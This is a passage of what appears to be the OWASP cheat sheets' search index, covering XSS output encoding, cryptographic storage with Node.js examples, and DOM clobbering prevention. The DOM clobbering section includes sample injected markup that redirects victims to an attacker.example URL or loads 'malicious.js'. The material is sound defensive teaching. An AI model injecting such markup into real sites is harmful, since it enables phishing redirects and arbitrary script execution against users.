\u201cJavaScript Contexts\u201d refer to placing variables into inline JavaScript which is then embedded in an HTML document. This is commonly seen in programs that heavily use custom JavaScript embedded in their web pages.

The only \u2018safe\u2019 location for placing variables in JavaScript is inside a \u201cquoted data value\u201d. All other contexts are unsafe and you should not place variable data in them.

Examples of \u201cQuoted Data Values\u201d

<script>alert('$varUnsafe')</script>\n<script>x='$varUnsafe'</script>\n<div onmouseover=\"'$varUnsafe'\"></div>\n

Encode all characters using the \xHH format. Encoding libraries often have an EncodeForJavaScript function or similar to support this.

Please look at the OWASP Java Encoder JavaScript encoding examples for examples of proper JavaScript use that requires minimal encoding.

For JSON, verify that the Content-Type header is application/json and not text/html to prevent XSS.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-css-contexts","title":"Output Encoding for \u201cCSS Contexts\u201d","text":"

\u201cCSS Contexts\u201d refer to variables placed into inline CSS. This is common when you want users to be able to customize the look and feel of their webpages. CSS is surprisingly powerful and has been used for many types of attacks. Variables should only be placed in a CSS property value. Other \u201cCSS Contexts\u201d are unsafe and you should not place variable data in them.

<style> selector { property : $varUnsafe; } </style>\n<style> selector { property : \"$varUnsafe\"; } </style>\n<span style=\"property : $varUnsafe\">Oh no</span>\n

If you're using JavaScript to change a CSS property, look into using style.property = x. This is a Safe Sink and will automatically CSS encode data in it.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-url-contexts","title":"Output Encoding for \u201cURL Contexts\u201d","text":"

\u201cURL Contexts\u201d refer to variables placed into a URL. Most commonly, a developer will add a parameter or URL fragment to a URL base that is then displayed or used in some operation. Use URL Encoding for these scenarios.

<a href=\"http://www.owasp.org?test=$varUnsafe\">link</a >\n

Encode all characters with the %HH encoding format. Make sure any attributes are fully quoted, same as JS and CSS.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#common-mistake","title":"Common Mistake","text":"

There will be situations where you use a URL in different contexts. The most common one would be adding it to an href or src attribute of an <a> tag. In these scenarios, you should do URL encoding, followed by HTML attribute encoding.

url = \"https://site.com?data=\" + urlencode(parameter)\n<a href='attributeEncode(url)'>link</a>\n

If you're using JavaScript to construct a URL Query Value, look into using window.encodeURIComponent(x). This is a Safe Sink and will automatically URL encode data in it.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#dangerous-contexts","title":"Dangerous Contexts","text":"

Output encoding is not perfect; it will not always prevent XSS. The locations where output encoding cannot be relied upon are known as dangerous contexts. Dangerous contexts include:

<script>Directly in a script</script>\n<!-- Inside an HTML comment -->\n<style>Directly in CSS</style>\n<div ToDefineAnAttribute=test />\n<ToDefineATag href=\"/test\" />\n

Other areas to be careful of include:

Don't place variables into dangerous contexts, as even with output encoding, an XSS attack cannot be fully prevented.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#html-sanitization","title":"HTML Sanitization","text":"

Sometimes users need to author HTML. One scenario would be to allow users to change the styling or structure of content inside a WYSIWYG editor. Output encoding here will prevent XSS, but it will break the intended functionality of the application. The styling will not be rendered. In these cases, HTML Sanitization should be used.

HTML Sanitization will strip dangerous HTML from a variable and return a safe string of HTML. OWASP recommends DOMPurify for HTML Sanitization.

let clean = DOMPurify.sanitize(dirty);\n

There are some further things to consider:

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#safe-sinks","title":"Safe Sinks","text":"

Security professionals often talk in terms of sources and sinks. If you pollute a river, it'll flow downstream somewhere. It\u2019s the same with computer security. XSS sinks are places where variables are placed into your webpage.

Thankfully, many sinks where variables can be placed are safe. This is because these sinks treat the variable as text and will never execute it. Try to refactor your code to remove references to unsafe sinks like innerHTML, and instead use textContent or value.

elem.textContent = dangerVariable;\nelem.insertAdjacentText(dangerVariable);\nelem.className = dangerVariable;\nelem.setAttribute(safeName, dangerVariable);\nformfield.value = dangerVariable;\ndocument.createTextNode(dangerVariable);\ndocument.createElement(dangerVariable);\nelem.innerHTML = DOMPurify.sanitize(dangerVar);\n

Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width.

For a comprehensive list, check out the DOMPurify allowlist

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#other-controls","title":"Other Controls","text":"

Framework Security Protections, Output Encoding, and HTML Sanitization will provide the best protection for your application. OWASP recommends these in all circumstances.

Consider adopting the following controls in addition to the above.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#xss-prevention-rules-summary","title":"XSS Prevention Rules Summary","text":"

The following snippets of HTML demonstrate how to safely render untrusted data in a variety of different contexts.

Data Type | Context | Code Sample | Defense\nString | HTML Body | <span>UNTRUSTED DATA </span> | HTML Entity Encoding (rule #1).\nString | Safe HTML Attributes | <input type=\"text\" name=\"fname\" value=\"UNTRUSTED DATA \"> | Aggressive HTML Entity Encoding (rule #2), Only place untrusted data into a list of safe attributes (listed below), Strictly validate unsafe attributes such as background, ID and name.\nString | GET Parameter | <a href=\"/site/search?value=UNTRUSTED DATA \">clickme</a> | URL Encoding (rule #5).\nString | Untrusted URL in a SRC or HREF attribute | <a href=\"UNTRUSTED URL \">clickme</a> <iframe src=\"UNTRUSTED URL \" /> | Canonicalize input, URL Validation, Safe URL verification, Allow-list http and HTTPS URLs only (Avoid the JavaScript Protocol to Open a new Window), Attribute encoder.\nString | CSS Value | HTML <div style=\"width: UNTRUSTED DATA ;\">Selection</div> | Strict structural validation (rule #4), CSS Hex encoding, Good design of CSS Features.\nString | JavaScript Variable | <script>var currentValue='UNTRUSTED DATA ';</script> <script>someFunction('UNTRUSTED DATA ');</script> | Ensure JavaScript variables are quoted, JavaScript Hex Encoding, JavaScript Unicode Encoding, Avoid backslash encoding (\\\" or \\' or \\\\).\nHTML | HTML Body | <div>UNTRUSTED HTML</div> | HTML Validation (JSoup, AntiSamy, HTML Sanitizer...).\nString | DOM XSS | <script>document.write(\"UNTRUSTED INPUT: \" + document.location.hash );<script/> | DOM based XSS Prevention Cheat Sheet\n
"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-rules-summary","title":"Output Encoding Rules Summary","text":"

The purpose of output encoding (as it relates to Cross Site Scripting) is to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. The following chart details a list of critical output encoding methods needed to stop Cross Site Scripting.

Encoding Type | Encoding Mechanism\nHTML Entity Encoding | Convert & to &amp;, Convert < to &lt;, Convert > to &gt;, Convert \" to &quot;, Convert ' to &#x27;\nHTML Attribute Encoding | Except for alphanumeric characters, encode all characters with the HTML Entity &#xHH; format, including spaces. (HH = Hex Value)\nURL Encoding | Standard percent encoding, see here. URL encoding should only be used to encode parameter values, not the entire URL or path fragments of a URL.\nJavaScript Encoding | Except for alphanumeric characters, encode all characters with the \\uXXXX unicode encoding format (X = Integer).\nCSS Hex Encoding | CSS encoding supports \\XX and \\XXXXXX. Using a two character encode can cause problems if the next character continues the encode sequence. There are two solutions: (a) add a space after the CSS encode (it will be ignored by the CSS parser), or (b) use the full amount of CSS encoding possible by zero padding the value.\n
"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#related-articles","title":"Related Articles","text":"

XSS Attack Cheat Sheet:

The following article describes how to exploit different kinds of XSS Vulnerabilities that this article was created to help you avoid:

Description of XSS Vulnerabilities:

Discussion on the Types of XSS Vulnerabilities:

How to Review Code for Cross-site scripting Vulnerabilities:

How to Test for Cross-site scripting Vulnerabilities:

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html","title":"Cryptographic Storage Cheat Sheet","text":""},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article provides a simple model to follow when implementing solutions to protect data at rest.

Passwords should not be stored using reversible encryption - secure password hashing algorithms should be used instead. The Password Storage Cheat Sheet contains further guidance on storing passwords.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#architectural-design","title":"Architectural Design","text":"

The first step in designing any application is to consider the overall architecture of the system, as this will have a huge impact on the technical implementation.

This process should begin with considering the threat model of the application (i.e., who you are trying to protect the data against).

The use of dedicated secret or key management systems can provide an additional layer of security protection, as well as making the management of secrets significantly easier - however it comes at the cost of additional complexity and administrative overhead - so may not be feasible for all applications. Note that many cloud environments provide these services, so these should be taken advantage of where possible. The Secrets Management Cheat Sheet contains further guidance on this topic.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#where-to-perform-encryption","title":"Where to Perform Encryption","text":"

Encryption can be performed on a number of levels in the application stack, such as:

Which layer(s) are most appropriate will depend on the threat model. For example, hardware level encryption is effective at protecting against the physical theft of the server, but will provide no protection if an attacker is able to compromise the server remotely.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#minimise-the-storage-of-sensitive-information","title":"Minimise the Storage of Sensitive Information","text":"

The best way to protect sensitive information is to not store it in the first place. Although this applies to all kinds of information, it is most often applicable to credit card details, as they are highly desirable for attackers, and PCI DSS has such stringent requirements for how they must be stored. Wherever possible, the storage of sensitive information should be avoided.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms","title":"Algorithms","text":"

For symmetric encryption, AES with a key that's at least 128 bits (ideally 256 bits) and a secure mode should be used as the preferred algorithm.

For asymmetric encryption, use elliptic curve cryptography (ECC) with a secure curve such as Curve25519 as a preferred algorithm. If ECC is not available and RSA must be used, then ensure that the key is at least 2048 bits.

Many other symmetric and asymmetric algorithms are available which have their own pros and cons, and they may be better or worse than AES or Curve25519 in specific use cases. When considering these, a number of factors should be taken into account, including:

In some cases there may be regulatory requirements that limit the algorithms that can be used, such as FIPS 140-2 or PCI DSS.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#custom-algorithms","title":"Custom Algorithms","text":"

Don't do this.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#cipher-modes","title":"Cipher Modes","text":"

There are various modes that can be used to allow block ciphers (such as AES) to encrypt arbitrary amounts of data, in the same way that a stream cipher would. These modes have different security and performance characteristics, and a full discussion of them is outside the scope of this cheat sheet. Some of the modes have requirements to generate secure initialisation vectors (IVs) and other attributes, but these should be handled automatically by the library.

Where available, authenticated modes should always be used. These provide guarantees of the integrity and authenticity of the data, as well as confidentiality. The most commonly used authenticated modes are GCM and CCM, which should be used as a first preference.
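
To illustrate, a minimal sketch of authenticated encryption with AES-256-GCM using Node's built-in crypto module (the key handling shown is purely illustrative; in practice the key would come from a key management system):

// Sketch: AES-256-GCM authenticated encryption with Node's crypto module.\nconst crypto = require('crypto');\n\nfunction encrypt(plaintext, key) {\nconst iv = crypto.randomBytes(12); // 96-bit IV, freshly generated for every message\nconst cipher = crypto.createCipheriv('aes-256-gcm', key, iv);\nconst ciphertext = Buffer.concat([cipher.update(plaintext, 'utf8'), cipher.final()]);\nconst tag = cipher.getAuthTag(); // integrity/authenticity tag produced by GCM\nreturn { iv, ciphertext, tag };\n}\n\nfunction decrypt(payload, key) {\nconst decipher = crypto.createDecipheriv('aes-256-gcm', key, payload.iv);\ndecipher.setAuthTag(payload.tag); // decryption throws if the data or tag was tampered with\nreturn Buffer.concat([decipher.update(payload.ciphertext), decipher.final()]).toString('utf8');\n}\n\nconst key = crypto.randomBytes(32); // 256-bit key; illustrative only\n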

If GCM or CCM are not available, then CTR mode or CBC mode should be used. As these do not provide any guarantees about the authenticity of the data, separate authentication should be implemented, such as using the Encrypt-then-MAC technique. Care needs to be taken when using this method with variable length messages.

ECB should not be used outside of very specific circumstances.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#random-padding","title":"Random Padding","text":"

For RSA, it is essential to enable Random Padding. Random Padding is also known as OAEP or Optimal Asymmetric Encryption Padding. This class of defense protects against Known Plain Text Attacks by adding randomness at the beginning of the payload.

The padding scheme of PKCS#1 is typically used in this case.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#secure-random-number-generation","title":"Secure Random Number Generation","text":"

Random numbers (or strings) are needed for various security critical functionality, such as generating encryption keys, IVs, session IDs, CSRF tokens or password reset tokens. As such, it is important that these are generated securely, and that it is not possible for an attacker to guess and predict them.

It is generally not possible for computers to generate truly random numbers (without special hardware), so most systems and languages provide two different types of randomness.

Pseudo-Random Number Generators (PRNGs) provide low-quality randomness much faster, and can be used for non-security related functionality (such as ordering results on a page, or randomising UI elements). However, they must not be used for anything security critical, as it is often possible for attackers to guess or predict the output.

Cryptographically Secure Pseudo-Random Number Generators (CSPRNGs) are designed to produce a much higher quality of randomness (more strictly, a greater amount of entropy), making them safe to use for security-sensitive functionality. However, they are slower and more CPU intensive, and can end up blocking in some circumstances when large amounts of random data are requested. As such, if large amounts of non-security related randomness are needed, they may not be appropriate.
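
For example, in Node.js the built-in crypto module provides CSPRNG-backed helpers, whereas Math.random() does not; a brief sketch:

// Sketch: CSPRNG-backed values from Node's crypto module (Math.random() is not suitable here).\nconst crypto = require('crypto');\n\nconst sessionId = crypto.randomBytes(32).toString('hex'); // e.g., a session identifier or CSRF token\nconst resetCode = crypto.randomInt(0, 1000000); // e.g., a numeric one-time code\n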

The table below shows the recommended algorithms for each language, as well as insecure functions that should not be used.

Language | Unsafe Functions | Cryptographically Secure Functions\nC | random(), rand() | getrandom(2)\nJava | java.util.Random() | java.security.SecureRandom\nPHP | rand(), mt_rand(), array_rand(), uniqid() | random_bytes(), random_int() in PHP 7 or openssl_random_pseudo_bytes() in PHP 5\n.NET/C# | Random() | RandomNumberGenerator\nObjective-C | arc4random() (uses the RC4 cipher) | SecRandomCopyBytes\nPython | random() | secrets()\nRuby | Random | SecureRandom\nGo | rand using the math/rand package | crypto/rand package\nRust | rand::prng::XorShiftRng | rand::prng::chacha::ChaChaRng and the rest of the Rust library CSPRNGs.\nNode.js | Math.random() | crypto.randomBytes, crypto.randomInt, crypto.randomUUID\n
"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#uuids-and-guids","title":"UUIDs and GUIDs","text":"

Universally unique identifiers (UUIDs or GUIDs) are sometimes used as a quick way to generate random strings. Although they can provide a reasonable source of randomness, this will depend on the type or version of the UUID that is created.

Specifically, version 1 UUIDs are composed of a high precision timestamp and the MAC address of the system that generated them, so are not random (although they may be hard to guess, given the timestamp is to the nearest 100ns). Version 4 UUIDs are randomly generated, although whether this is done using a CSPRNG will depend on the implementation. Unless this is known to be secure in the specific language or framework, the randomness of UUIDs should not be relied upon.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#defence-in-depth","title":"Defence in Depth","text":"

Applications should be designed to still be secure even if cryptographic controls fail. Any information that is stored in an encrypted form should also be protected by additional layers of security. Applications should also not rely on the security of encrypted URL parameters, and should enforce strong access control to prevent unauthorised access to information.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-management","title":"Key Management","text":""},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#processes","title":"Processes","text":"

Formal processes should be implemented (and tested) to cover all aspects of key management, including:

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-generation","title":"Key Generation","text":"

Keys should be randomly generated using a cryptographically secure function, such as those discussed in the Secure Random Number Generation section. Keys should not be based on common words or phrases, or on \"random\" characters generated by mashing the keyboard.

Where multiple keys are used (such as separate data-encrypting and key-encrypting keys), they should be fully independent from each other.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-lifetimes-and-rotation","title":"Key Lifetimes and Rotation","text":"

Encryption keys should be changed (or rotated) based on a number of different criteria:

Once one of these criteria has been met, a new key should be generated and used for encrypting any new data. There are two main approaches for how existing data that was encrypted with the old key(s) should be handled:

  1. Decrypting it and re-encrypting it with the new key.
  2. Marking each item with the ID of the key that was used to encrypt it, and storing multiple keys to allow the old data to be decrypted.

The first option should generally be preferred, as it greatly simplifies both the application code and key management processes; however, it may not always be feasible. Note that old keys should generally be stored for a certain period after they have been retired, in case old backups or copies of the data need to be decrypted.
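
As a rough sketch of the second approach (assuming Node.js, AES-256-GCM and an in-memory map of key versions; the key IDs are illustrative):

 const crypto = require('crypto');\nconst keys = { 'key-2023-01': crypto.randomBytes(32), 'key-2023-07': crypto.randomBytes(32) };\nconst currentKeyId = 'key-2023-07'; // new data is always encrypted with the current key\nfunction encryptRecord(plaintext) {\nconst iv = crypto.randomBytes(12);\nconst cipher = crypto.createCipheriv('aes-256-gcm', keys[currentKeyId], iv);\nconst ciphertext = Buffer.concat([cipher.update(plaintext, 'utf8'), cipher.final()]);\nreturn { keyId: currentKeyId, iv, tag: cipher.getAuthTag(), ciphertext }; // keyId stored with the item\n}\nfunction decryptRecord(record) {\nconst decipher = crypto.createDecipheriv('aes-256-gcm', keys[record.keyId], record.iv);\ndecipher.setAuthTag(record.tag);\nreturn Buffer.concat([decipher.update(record.ciphertext), decipher.final()]).toString('utf8');\n}\n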

It is important that the code and processes required to rotate a key are in place before they are required, so that keys can be quickly rotated in the event of a compromise. Additionally, processes should also be implemented to allow the encryption algorithm or library to be changed, in case a new vulnerability is found in the algorithm or implementation.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#key-storage","title":"Key Storage","text":"

Securely storing cryptographic keys is one of the hardest problems to solve, as the application always needs to have some level of access to the keys in order to decrypt the data. While it may not be possible to fully protect the keys from an attacker who has fully compromised the application, a number of steps can be taken to make it harder for them to obtain the keys.

Where available, the secure storage mechanisms provided by the operating system, framework or cloud service provider should be used. These include:

There are many advantages to using these types of secure storage over simply putting keys in configuration files. The specifics of these will vary depending on the solution used, but they include:

In some cases none of these will be available, such as in a shared hosting environment, meaning that it is not possible to obtain a high degree of protection for any encryption keys. However, the following basic rules can still be followed:

The Secrets Management Cheat Sheet provides more details on securely storing secrets.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#separation-of-keys-and-data","title":"Separation of Keys and Data","text":"

Where possible, encryption keys should be stored in a separate location from encrypted data. For example, if the data is stored in a database, the keys should be stored in the filesystem. This means that if an attacker only has access to one of these (for example through directory traversal or SQL injection), they cannot access both the keys and the data.

Depending on the architecture of the environment, it may be possible to store the keys and data on separate systems, which would provide a greater degree of isolation.

"},{"location":"cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#encrypting-stored-keys","title":"Encrypting Stored Keys","text":"

Where possible, encryption keys should themselves be stored in an encrypted form. At least two separate keys are required for this: the Data Encryption Key (DEK), which is used to encrypt the data, and the Key Encryption Key (KEK), which is used to encrypt the DEK.

For this to be effective, the KEK must be stored separately from the DEK. The encrypted DEK can be stored with the data, but will only be usable if an attacker is able to also obtain the KEK, which is stored on another system.

The KEK should also be at least as strong as the DEK. The envelope encryption guidance from Google contains further details on how to manage DEKs and KEKs.

In simpler application architectures (such as shared hosting environments) where the KEK and DEK cannot be stored separately, there is limited value to this approach, as an attacker is likely to be able to obtain both of the keys at the same time. However, it can provide an additional barrier to unskilled attackers.

A key derivation function (KDF) could be used to generate a KEK from user-supplied input (such as a passphrase), which would then be used to encrypt a randomly generated DEK. This allows the KEK to be easily changed (when the user changes their passphrase), without needing to re-encrypt the data (as the DEK remains the same).
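
A minimal sketch of this pattern (assuming Node.js, scrypt as the KDF and AES-256-GCM for wrapping; all parameter choices are illustrative):

 const crypto = require('crypto');\nconst passphrase = 'user-supplied passphrase'; // illustrative user input\nconst dek = crypto.randomBytes(32); // random data-encrypting key; unchanged when the passphrase changes\nconst salt = crypto.randomBytes(16);\nconst kek = crypto.scryptSync(passphrase, salt, 32); // key-encrypting key derived from the passphrase\nconst iv = crypto.randomBytes(12);\nconst cipher = crypto.createCipheriv('aes-256-gcm', kek, iv);\nconst wrappedDek = Buffer.concat([cipher.update(dek), cipher.final()]);\n// Store salt, iv, cipher.getAuthTag() and wrappedDek; a passphrase change only requires re-wrapping the DEK.\n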

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html","title":"DOM Clobbering Prevention Cheat Sheet","text":""},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

DOM Clobbering is a type of code-reuse, HTML-only injection attack, where attackers confuse a web application by injecting HTML elements whose id or name attribute matches the name of security-sensitive variables or browser APIs, such as variables used for fetching remote content (e.g., script src), and overshadow their value.

It is particularly relevant when script injection is not possible, e.g., when filtered by HTML sanitizers, or mitigated by disallowing or controlling script execution. In these scenarios, attackers may still inject non-script HTML markups into webpages and transform the initially secure markup into executable code, achieving Cross-Site Scripting (XSS).

This cheat sheet is a list of guidelines, secure coding patterns, and practices to prevent or restrict the impact of DOM Clobbering in your web application.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#background","title":"Background","text":"

Before we dive into DOM Clobbering, let's refresh our knowledge with some basic Web background.

When a webpage is loaded, the browser creates a DOM tree that represents the structure and content of the page, and JavaScript code has read and write access to this tree.

When creating the DOM tree, browsers also create an attribute for (some) named HTML elements on window and document objects. Named HTML elements are those having an id or name attribute. For example, the markup:

<form id=x></form>\n

will lead to browsers creating references to that form element with the attribute x of window and document:

var obj1 = document.getElementById('x');\nvar obj2 = document.x;\nvar obj3 = document.x;\nvar obj4 = window.x;\nvar obj5 = x; // by default, objects belong to the global Window, so x is same as window.x\nconsole.log(\nobj1 === obj2 && obj2 === obj3 &&\nobj3 === obj4 && obj4 === obj5\n); // true\n

When accessing an attribute of window and document objects, named HTML element references come before lookups of built-in APIs and other attributes on window and document that developers have defined, also known as named property accesses. Developers unaware of such behavior may use the content of window/document attributes for sensitive operations, such as URLs for fetching remote content, and attackers can exploit it by injecting markups with colliding names. Similarly to custom attributes/variables, built-in browser APIs may be overshadowed by DOM Clobbering.

If attackers are able to inject (non-script) HTML markup in the DOM tree, it can change the value of a variable that the web application relies on due to named property accesses, causing it to malfunction, expose sensitive data, or execute attacker-controlled scripts. DOM Clobbering works by taking advantage of this (legacy) behaviour, causing a namespace collision between the execution environment (i.e., window and document objects), and JavaScript code.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#example-attack-1","title":"Example Attack 1","text":"
let redirectTo = window.redirectTo || '/profile/';\nlocation.assign(redirectTo);\n

The attacker can:
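inject a markup such as the following (the URL is illustrative) to clobber the redirectTo variable:

<a id=redirectTo href='https://attacker.example/phish'></a>\n

The injected anchor is a named element, so window.redirectTo now resolves to it; when it is coerced to a string it yields its href, and location.assign() sends the victim to the attacker-controlled URL.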

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#example-attack-2","title":"Example Attack 2","text":"
var script = document.createElement('script');\nlet src = window.config.url || 'script.js';\nscript.src = src;\ndocument.body.appendChild(script);\n

The attacker can inject the markup <a id=config><a id=config name=url href='malicious.js'> to load additional JavaScript code, and obtain arbitrary client-side code execution.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#summary-of-guidelines","title":"Summary of Guidelines","text":"

For quick reference, below is the summary of guidelines discussed next.

Guidelines Description # 1 Use HTML Sanitizers link # 2 Use Content-Security Policy link # 3 Freeze Sensitive DOM Objects link # 4 Validate All Inputs to DOM Tree link # 5 Use Explicit Variable Declarations link # 6 Do Not Use Document and Window for Global Variables link # 7 Do Not Trust Document Built-in APIs Before Validation link # 8 Enforce Type Checking link # 9 Use Strict Mode link # 10 Apply Browser Feature Detection link # 11 Limit Variables to Local Scope link # 12 Use Unique Variable Names In Production link # 13 Use Object-oriented Programming Techniques like Encapsulation link"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#mitigation-techniques","title":"Mitigation Techniques","text":""},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#1-html-sanitization","title":"#1: HTML Sanitization","text":"

Robust HTML sanitizers can prevent or restrict the risk of DOM Clobbering. They can do so in multiple ways. For example:

OWASP recommends DOMPurify or the Sanitizer API for HTML sanitization.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#dompurify-sanitizer","title":"DOMPurify Sanitizer","text":"

By default, DOMPurify removes all clobbering collisions with built-in APIs and properties (using the enabled-by-default SANITIZE_DOM configuration option).

To be protected against clobbering of custom variables and properties as well, you need to enable the SANITIZE_NAMED_PROPS config:

var clean = DOMPurify.sanitize(dirty, {SANITIZE_NAMED_PROPS: true});\n

This isolates the namespace of named properties and JavaScript variables by prefixing them with the string user-content-.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#sanitizer-api","title":"Sanitizer API","text":"

The new browser-built-in Sanitizer API does not prevent DOM Clobbering in its default setting, but can be configured to remove named properties:

const sanitizerInstance = new Sanitizer({\nblockAttributes: [\n{'name': 'id', elements: '*'},\n{'name': 'name', elements: '*'}\n]\n});\ncontainerDOMElement.setHTML(input, {sanitizer: sanitizerInstance});\n
"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#2-content-security-policy","title":"#2: Content-Security Policy","text":"

Content-Security Policy (CSP) is a set of rules that tell the browser which resources are allowed to be loaded on a web page. By restricting the sources of JavaScript files (e.g., with the script-src directive), CSP can prevent malicious code from being injected into the page.

Note: CSP can only mitigate some variants of DOM clobbering attacks, such as when attackers attempt to load new scripts by clobbering script sources, but not when already-present code can be abused for code execution, e.g., clobbering the parameters of code evaluation constructs like eval().

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#3-freezing-sensitive-dom-objects","title":"#3: Freezing Sensitive DOM Objects","text":"

A simple way to mitigate DOM Clobbering against individual objects could be to freeze sensitive DOM objects and their properties, e.g., via the Object.freeze() method.
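
A minimal sketch (the object name appConfig and its contents are illustrative):

 'use strict';\n// Freeze an object holding security-sensitive settings so its properties cannot be overwritten.\nconst appConfig = Object.freeze({ scriptSrc: '/static/app.js' });\n// appConfig.scriptSrc = 'https://attacker.example/evil.js'; // would throw a TypeError in strict mode\n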

Note: Freezing object properties prevents them from being overwritten by named DOM elements. But, determining all objects and object properties that need to be frozen may not be easy, limiting the usefulness of this approach.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#secure-coding-guidelines","title":"Secure Coding Guidelines","text":"

DOM Clobbering can be avoided by defensive programming and adhering to a few coding patterns and guidelines.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#4-validate-all-inputs-to-dom-tree","title":"#4: Validate All Inputs to DOM Tree","text":"

Before inserting any markup into the webpage's DOM tree, sanitize id and name attributes (see HTML sanitization).

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#5-use-explicit-variable-declarations","title":"#5: Use Explicit Variable Declarations","text":"

When initializing variables, always use a variable declarator like var, let or const, which prevents clobbering of the variable.

Note: Declaring a variable with let does not create a property on window, unlike var. Therefore, window.VARNAME can still be clobbered (assuming VARNAME is the name of the variable).
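
For illustration, assuming an attacker has injected <img id=config src=x> into the page:

 let config = { url: '/api/data' }; // explicitly declared, so this binding cannot be clobbered\nconsole.log(config.url); // '/api/data'\nconsole.log(window.config); // may still be the injected <img> element, since let creates no window property\n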

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#6-do-not-use-document-and-window-for-global-variables","title":"#6: Do Not Use Document and Window for Global Variables","text":"

Avoid using objects like document and window for storing global variables, because they can be easily manipulated (see, e.g., here).

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#7-do-not-trust-document-built-in-apis-before-validation","title":"#7: Do Not Trust Document Built-in APIs Before Validation","text":"

Document properties, including built-in ones, are always overshadowed by DOM Clobbering, even right after they are assigned a value.

Hint: This is due to the so-called named property visibility algorithm, where named HTML element references come before lookups of built-in APIs and other attributes on document.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#8-enforce-type-checking","title":"#8: Enforce Type Checking","text":"

Always check the type of Document and Window properties before using them in sensitive operations, e.g., using the instanceof operator.

Hint: When an object is clobbered, it would refer to an HTMLElement instance, which may not be the expected type.
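
A minimal sketch, building on Example Attack 1 above:

 let redirectTo = window.redirectTo;\nif (redirectTo instanceof HTMLElement || typeof redirectTo !== 'string') {\nredirectTo = '/profile/'; // clobbered or unexpected type: fall back to a safe default\n}\nlocation.assign(redirectTo);\n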

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#9-use-strict-mode","title":"#9: Use Strict Mode","text":"

Use strict mode to prevent unintended global variable creation, and to raise an error when there is an attempt to overwrite read-only properties.
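
For example, a minimal sketch:

 'use strict';\n// undeclaredName = 1; // would throw a ReferenceError instead of silently creating a global\nconst frozen = Object.freeze({ safe: true });\n// frozen.safe = false; // would throw a TypeError instead of failing silently\n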

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#10-apply-browser-feature-detection","title":"#10: Apply Browser Feature Detection","text":"

Instead of relying on browser-specific features or properties, use feature detection to determine whether a feature is supported before using it. This can help prevent errors and DOM Clobbering that might arise when using those features in unsupported browsers.

Hint: Unsupported feature APIs can act as an undefined variable/property in unsupported browsers, making them clobberable.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#11-limit-variables-to-local-scope","title":"#11: Limit Variables to Local Scope","text":"

Global variables are more prone to being overwritten by DOM Clobbering. Whenever possible, use local variables and object properties.

